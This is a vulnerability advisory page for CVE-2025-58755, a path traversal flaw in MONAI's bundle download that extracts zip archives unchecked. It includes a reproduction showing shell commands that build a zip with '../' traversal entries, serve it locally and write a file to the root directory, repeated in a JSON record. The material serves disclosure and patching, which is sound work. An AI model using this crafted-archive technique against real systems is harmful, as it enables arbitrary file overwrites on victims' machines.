GHSA-X6WW-PF9M-M73M

Vulnerability from github – Published: 2025-09-09 21:19 – Updated: 2025-09-26 16:36
VLAI?
Summary
MONAI does not prevent path traversal, potentially leading to arbitrary file writes
Details

Summary

The extractall function zip_file.extractall(output_dir) is used directly to process compressed files. It is used in many places in the project. When the Zip file containing malicious content is decompressed, it will overwrite the system files. In addition, the project allows the download of the zip content through the link, which increases the scope of exploitation of this vulnerability.

When reproducing locally, follow the process below to create a malicious zip file and simulate the process of remotely downloading the zip file.

root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# mkdir -p test_bundle
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# echo "malicious content" > test_bundle/malicious.txt 
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# cd test_bundle  
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm/test_bundle# zip -r ../malicious.zip . ../../../../../../etc/passwd
  adding: malicious.txt (stored 0%)
  adding: ../../../../../../etc/passwd (deflated 64%)
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm/test_bundle# cd ..
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls
malicious.zip  p1.py  p2.py  r1.py  test_bundle

Then start the http service through python

root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Another terminal simulates a normal user downloading zip content from the Internet, perhaps from some popular forums or blogs, such as huggingface, etc.

root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python -c "from monai.bundle.scripts import download; download(name='test_bundle', url='http://localhost:8000/malicious.zip', bundle_dir='/tmp/test_extract')"
2025-08-11 20:49:01,668 - INFO - --- input summary of monai.bundle.scripts.download ---
2025-08-11 20:49:01,668 - INFO - > name: 'test_bundle'
2025-08-11 20:49:01,668 - INFO - > bundle_dir: '/tmp/test_extract'
2025-08-11 20:49:01,668 - INFO - > source: 'monaihosting'
2025-08-11 20:49:01,668 - INFO - > url: 'http://localhost:8000/malicious.zip'
2025-08-11 20:49:01,668 - INFO - > remove_prefix: 'monai_'
2025-08-11 20:49:01,668 - INFO - > progress: True
2025-08-11 20:49:01,668 - INFO - ---


test_bundle.zip: 8.00kB [00:00, 204kB/s]
2025-08-11 20:49:01,710 - INFO - Downloaded: /tmp/test_extract/test_bundle.zip
2025-08-11 20:49:01,710 - INFO - Expected md5 is None, skip md5 check for file /tmp/test_extract/test_bundle.zip.
2025-08-11 20:49:01,710 - INFO - Writing into directory: /tmp/test_extract.
2025-08-11 20:49:01,711 - WARNING - metadata file not found in /tmp/test_extract/test_bundle/configs/metadata.json.
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /
autodl-pub  cuda-keyring_1.0-1_all.deb  home  lib32   **malicious.txt**  opt   run   sys  var
bin         dev                         init  lib64   media          proc  sbin  tmp
boot        etc                         lib   libx32  mnt            root  srv   usr

We can see that malicious.txt was indeed extracted to the root directory, demonstrating that the path traversal successfully wrote the malicious file. If the Zip file contains SSH keys, malicious content that automatically loads when the user boots the computer, or overwrites legitimate user files, causing services to become inoperable, these actions could cause extremely serious damage.

Impact

Arbitrary file write

Repair Suggestions

Check the contents of the downloaded Zip file, or use a safer method to load it

Severity ?
8.8 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.5.0"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "monai"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.5.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-58755"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-09T21:19:22Z",
    "nvd_published_at": "2025-09-09T00:15:32Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe extractall function ```zip_file.extractall(output_dir)``` is used directly to process compressed files. It is used in many places in the project. When the Zip file containing malicious content is decompressed, it will overwrite the system files. In addition, the project allows the download of the zip content through the link, which increases the scope of exploitation of this vulnerability.\n\nWhen reproducing locally, follow the process below to create a malicious zip file and simulate the process of remotely downloading the zip file.\n```\nroot@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# mkdir -p test_bundle\nroot@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# echo \"malicious content\" \u003e test_bundle/malicious.txt \nroot@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# cd test_bundle  \nroot@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm/test_bundle# zip -r ../malicious.zip . ../../../../../../etc/passwd\n  adding: malicious.txt (stored 0%)\n  adding: ../../../../../../etc/passwd (deflated 64%)\nroot@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm/test_bundle# cd ..\nroot@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls\nmalicious.zip  p1.py  p2.py  r1.py  test_bundle\n```\nThen start the http service through python\n```\nroot@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python -m http.server 8000\nServing HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...\n```\nAnother terminal simulates a normal user downloading zip content from the Internet, perhaps from some popular forums or blogs, such as huggingface, etc.\n```\nroot@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python -c \"from monai.bundle.scripts import download; download(name=\u0027test_bundle\u0027, url=\u0027http://localhost:8000/malicious.zip\u0027, bundle_dir=\u0027/tmp/test_extract\u0027)\"\n2025-08-11 20:49:01,668 - INFO - --- input summary of monai.bundle.scripts.download ---\n2025-08-11 20:49:01,668 - INFO - \u003e name: \u0027test_bundle\u0027\n2025-08-11 20:49:01,668 - INFO - \u003e bundle_dir: \u0027/tmp/test_extract\u0027\n2025-08-11 20:49:01,668 - INFO - \u003e source: \u0027monaihosting\u0027\n2025-08-11 20:49:01,668 - INFO - \u003e url: \u0027http://localhost:8000/malicious.zip\u0027\n2025-08-11 20:49:01,668 - INFO - \u003e remove_prefix: \u0027monai_\u0027\n2025-08-11 20:49:01,668 - INFO - \u003e progress: True\n2025-08-11 20:49:01,668 - INFO - ---\n\n\ntest_bundle.zip: 8.00kB [00:00, 204kB/s]\n2025-08-11 20:49:01,710 - INFO - Downloaded: /tmp/test_extract/test_bundle.zip\n2025-08-11 20:49:01,710 - INFO - Expected md5 is None, skip md5 check for file /tmp/test_extract/test_bundle.zip.\n2025-08-11 20:49:01,710 - INFO - Writing into directory: /tmp/test_extract.\n2025-08-11 20:49:01,711 - WARNING - metadata file not found in /tmp/test_extract/test_bundle/configs/metadata.json.\nroot@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /\nautodl-pub  cuda-keyring_1.0-1_all.deb  home  lib32   **malicious.txt**  opt   run   sys  var\nbin         dev                         init  lib64   media          proc  sbin  tmp\nboot        etc                         lib   libx32  mnt            root  srv   usr\n```\nWe can see that malicious.txt was indeed extracted to the root directory, demonstrating that the path traversal successfully wrote the malicious file.\nIf the Zip file contains SSH keys, malicious content that automatically loads when the user boots the computer, or overwrites legitimate user files, causing services to become inoperable, these actions could cause extremely serious damage.\n\n### Impact\nArbitrary file write\n\n### Repair Suggestions\nCheck the contents of the downloaded Zip file, or use a safer method to load it",
  "id": "GHSA-x6ww-pf9m-m73m",
  "modified": "2025-09-26T16:36:40Z",
  "published": "2025-09-09T21:19:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Project-MONAI/MONAI/security/advisories/GHSA-x6ww-pf9m-m73m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58755"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Project-MONAI/MONAI/pull/8568"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Project-MONAI/MONAI/commit/946cfdff096d8b1d289063f06a04cae3fa3559d9"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Project-MONAI/MONAI"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "MONAI does not prevent path traversal, potentially leading to arbitrary file writes"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.